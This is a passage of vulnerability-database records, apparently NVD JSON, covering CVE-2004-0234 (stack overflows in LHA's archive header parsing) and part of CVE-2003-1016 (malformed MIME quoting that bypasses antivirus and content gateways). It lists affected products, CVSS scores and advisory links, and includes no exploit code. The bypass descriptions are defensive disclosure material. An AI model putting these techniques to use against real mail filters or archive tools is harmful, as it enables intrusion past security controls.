cve@mitre.orghttp://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html
cve@mitre.orghttp://www.redhat.com/support/errata/RHSA-2004-178.html
cve@mitre.orghttp://www.redhat.com/support/errata/RHSA-2004-179.html
cve@mitre.orghttp://www.securityfocus.com/bid/10243Exploit, Patch, Vendor Advisory
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1220Vendor Advisory
cve@mitre.orghttps://bugzilla.fedora.us/show_bug.cgi?id=1833
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/16012
cve@mitre.orghttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977
cve@mitre.orghttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881
af854a3a-2127-422b-91ae-364da2661108http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html
af854a3a-2127-422b-91ae-364da2661108http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840
af854a3a-2127-422b-91ae-364da2661108http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html
af854a3a-2127-422b-91ae-364da2661108http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html
af854a3a-2127-422b-91ae-364da2661108http://marc.info/?l=bugtraq&m=108422737918885&w=2
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19514Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://security.gentoo.org/glsa/glsa-200405-02.xml
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1015866
af854a3a-2127-422b-91ae-364da2661108http://www.debian.org/security/2004/dsa-515
af854a3a-2127-422b-91ae-364da2661108http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt
af854a3a-2127-422b-91ae-364da2661108http://www.osvdb.org/5753
af854a3a-2127-422b-91ae-364da2661108http://www.osvdb.org/5754
af854a3a-2127-422b-91ae-364da2661108http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html
af854a3a-2127-422b-91ae-364da2661108http://www.redhat.com/support/errata/RHSA-2004-178.html
af854a3a-2127-422b-91ae-364da2661108http://www.redhat.com/support/errata/RHSA-2004-179.html
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/10243Exploit, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1220Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108https://bugzilla.fedora.us/show_bug.cgi?id=1833
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/16012
af854a3a-2127-422b-91ae-364da2661108https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977
af854a3a-2127-422b-91ae-364da2661108https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881
Impacted products
Vendor Product Version
clearswift mailsweeper 4.0
clearswift mailsweeper 4.1
clearswift mailsweeper 4.2
clearswift mailsweeper 4.3
clearswift mailsweeper 4.3.3
clearswift mailsweeper 4.3.4
clearswift mailsweeper 4.3.5
clearswift mailsweeper 4.3.6
clearswift mailsweeper 4.3.6_sp1
clearswift mailsweeper 4.3.7
clearswift mailsweeper 4.3.8
clearswift mailsweeper 4.3.10
clearswift mailsweeper 4.3.11
clearswift mailsweeper 4.3.13
f-secure f-secure_anti-virus 4.51
f-secure f-secure_anti-virus 4.51
f-secure f-secure_anti-virus 4.51
f-secure f-secure_anti-virus 4.52
f-secure f-secure_anti-virus 4.52
f-secure f-secure_anti-virus 4.52
f-secure f-secure_anti-virus 4.60
f-secure f-secure_anti-virus 5.5
f-secure f-secure_anti-virus 5.41
f-secure f-secure_anti-virus 5.41
f-secure f-secure_anti-virus 5.41
f-secure f-secure_anti-virus 5.42
f-secure f-secure_anti-virus 5.42
f-secure f-secure_anti-virus 5.42
f-secure f-secure_anti-virus 5.52
f-secure f-secure_anti-virus 6.21
f-secure f-secure_anti-virus 2003
f-secure f-secure_anti-virus 2004
f-secure f-secure_for_firewalls 6.20
f-secure f-secure_internet_security 2003
f-secure f-secure_internet_security 2004
f-secure f-secure_personal_express 4.5
f-secure f-secure_personal_express 4.6
f-secure f-secure_personal_express 4.7
f-secure internet_gatekeeper 6.31
f-secure internet_gatekeeper 6.32
rarlab winrar 3.20
redhat lha 1.14i-9
sgi propack 2.4
sgi propack 3.0
stalker cgpmcafee 3.2
tsugio_okamoto lha 1.14
tsugio_okamoto lha 1.15
tsugio_okamoto lha 1.17
winzip winzip 9.0
redhat fedora_core core_1.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFE4FA19-F2EA-4292-A441-2E4A39366942",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA5D7FD1-D5AB-4987-801A-FA464C31298A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "772710C7-41FE-47E2-B0D7-A3C8D36C8808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "7358AD98-44C1-4CC4-BD50-CFF3822F3A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "AAA1C283-E518-4BC6-BBF0-FCE09F9E0F17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B8A74FB-07B0-42D6-ABF3-D7A073A329E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "49668AFD-4821-4D5A-BEBD-DF55A8AB58C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "57E0BFFD-D777-43A5-AEE8-765F55C86E93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAF9A151-6EBF-4760-A154-A34FF7C9E632",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_gateways:*:*:*:*:*",
              "matchCriteriaId": "6CC9AA17-3EF4-4BC5-9E29-5A6525B9AC51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_servers:*:*:*:*:*",
              "matchCriteriaId": "A9C60C23-FC4D-4D14-B3E3-ECD797888AB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_workstations:*:*:*:*:*",
              "matchCriteriaId": "D04E2381-68CB-455F-8878-17C8E4112C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_gateways:*:*:*:*:*",
              "matchCriteriaId": "4AE00A20-8152-48D9-9AC4-EA359284E635",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_servers:*:*:*:*:*",
              "matchCriteriaId": "6B334073-9FF3-4F75-8702-51DB6937B7F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_workstations:*:*:*:*:*",
              "matchCriteriaId": "2D553EF0-6A08-4DD0-A301-99AADAFBFFBB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.60:*:samba_servers:*:*:*:*:*",
              "matchCriteriaId": "C8C41338-0651-425E-A823-C8CBD91977D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.5:*:client_security:*:*:*:*:*",
              "matchCriteriaId": "46F72328-7B69-4A1B-A065-E65544F27A75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:mimesweeper:*:*:*:*:*",
              "matchCriteriaId": "2BA28970-0DB9-433E-83A1-36BF05DB062A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:windows_servers:*:*:*:*:*",
              "matchCriteriaId": "C0D25A1D-2B31-4B29-96FE-A793F8244F66",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:workstations:*:*:*:*:*",
              "matchCriteriaId": "AC90ADFD-32FE-4EA1-9583-5EFE585152CB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:mimesweeper:*:*:*:*:*",
              "matchCriteriaId": "B490FC59-616A-4F90-95D8-50F9C0D6CB40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:windows_servers:*:*:*:*:*",
              "matchCriteriaId": "858468E0-4208-4703-A3AA-4BF6CC254DDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:workstations:*:*:*:*:*",
              "matchCriteriaId": "4E26052D-35B8-44E7-8F66-442BA55F4483",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.52:*:client_security:*:*:*:*:*",
              "matchCriteriaId": "CBA4A9B7-626A-4539-852F-96C49D860E41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:6.21:*:ms_exchange:*:*:*:*:*",
              "matchCriteriaId": "19828867-7079-4233-A3B8-BF7A3052FB8B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:2003:*:*:*:*:*:*:*",
              "matchCriteriaId": "831F0C4D-C85F-46DA-BC9E-D3F56DE2B085",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_anti-virus:2004:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F996B07-8B07-42A6-86FC-B5B55F708861",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_for_firewalls:6.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "119D5A71-E7C2-4603-9D78-A161D82BC2D1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_internet_security:2003:*:*:*:*:*:*:*",
              "matchCriteriaId": "6689D4E1-F8DC-46D9-BA35-4E4AE9C28456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_internet_security:2004:*:*:*:*:*:*:*",
              "matchCriteriaId": "0429B86A-F228-44E8-ABBB-D57BEE3679F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_personal_express:4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "72DE7015-C1FF-4803-8B28-5AF5ECC3AAB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_personal_express:4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "D04F7296-3290-40D1-9CFB-E52FADAE5719",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:f-secure_personal_express:4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B9A0DDB6-4B86-430E-879A-C835DBB96C42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rarlab:winrar:3.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "C1011521-AEF2-40EB-B671-66B20FF01CC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:redhat:lha:1.14i-9:*:i386:*:*:*:*:*",
              "matchCriteriaId": "EB59539A-8973-45C8-A553-1B524DA43937",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "0702A32E-E577-403C-B4D9-15037D7100A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "29DC217F-C257-4A3C-9CBD-08010C30BEC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:stalker:cgpmcafee:3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FC4CB399-2E2F-4A73-BA41-3EFB0DBDC404",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tsugio_okamoto:lha:1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "081C75A4-FDB1-4941-8276-985570632A82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tsugio_okamoto:lha:1.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "A623BD1B-DB9A-4545-9970-E3492AA39A33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:tsugio_okamoto:lha:1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "8984B914-9850-405C-AAE6-A7C266F13BA3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:winzip:winzip:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "523ADB29-C3D5-4C06-89B6-22B5FC68C240",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C84296C-2C8A-4DCD-9751-52951F8BEA9F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples desbordamientos de b\u00fafer basados en la pila en la funci\u00f3n get_header de header.c de LHA 1.14 utilizado en productos como Barracuda Spam Firewall, permite a atacantes remotos o a usuarios locales ejecutar c\u00f3digo arbitrario mediante nombres de fichero o de directorio largos en un archivo LHA, lo que dispara el desbordamiento cuando se prueba o se extrae un fichero."
    }
  ],
  "id": "CVE-2004-0234",
  "lastModified": "2024-11-20T23:48:03.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-08-18T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19514"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1015866"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2004/dsa-515"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/5753"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/5754"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/10243"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2006/1220"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19514"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1015866"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2004/dsa-515"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/5753"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/5754"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/10243"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2006/1220"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:46
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use malformed quoting in MIME headers, parameters, and values, including (1) fields that should not be quoted, (2) duplicate quotes, or (3) missing leading or trailing quote characters, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use malformed quoting in MIME headers, parameters, and values, including (1) fields that should not be quoted, (2) duplicate quotes, or (3) missing leading or trailing quote characters, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan entrecomillado malformado en cabeceras MIME, par\u00e1metros y valores, incluyendo (1) campos que no deber\u00edan ser entrecomillados, (2) comillas duplicadas, o (3) falta de caract\u00e9res al principio o al final, lo que puede ser interpretado de manera distinta por clientes de correo electr\u00f3nico."
    }
  ],
  "id": "CVE-2003-1016",
  "lastModified": "2024-11-20T23:46:09.513",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109521027007616\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
